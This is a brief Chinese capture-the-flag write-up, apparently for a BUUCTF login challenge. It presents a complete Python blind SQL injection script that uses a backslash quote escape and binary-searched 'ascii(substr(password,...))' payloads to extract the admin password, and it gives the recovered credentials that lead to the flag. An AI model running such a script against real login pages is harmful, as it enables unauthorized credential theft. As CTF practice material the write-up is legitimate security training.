打开环境,发现是个登录界面,当然,可以向sql注入方向去思考了。
访问robots.txt得到提示:hint.txt,访问hint.txt
嘶~,还是直接上脚本吧
1 import requests 2 url = "http://bc5d0433-45b5-486d-8fdd-541a8662fd10.node3.buuoj.cn/index.php" 3 4 data = {"username":"admin\","password":""} 5 result = "" 6 i = 0 7 8 while( True ): 9 i = i + 1 10 head=32 11 tail=127 12 13 while( head < tail ): 14 mid = (head + tail) >> 1 15 16 #payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid) 17 payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#"%(i,mid) 18 19 data['password'] = payload 20 r = requests.post(url,data=data) 21 22 if "stronger" in r.text : 23 head = mid + 1 24 else: 25 tail = mid 26 27 last = result 28 29 if head!=32: 30 result += chr(head) 31 else: 32 break 33 print(result)
这样就能将密码跑出来
然后用户名:admin;密码:OhyOuFOuNdit
登录上去就可以拿到flag
感谢大佬提供的脚本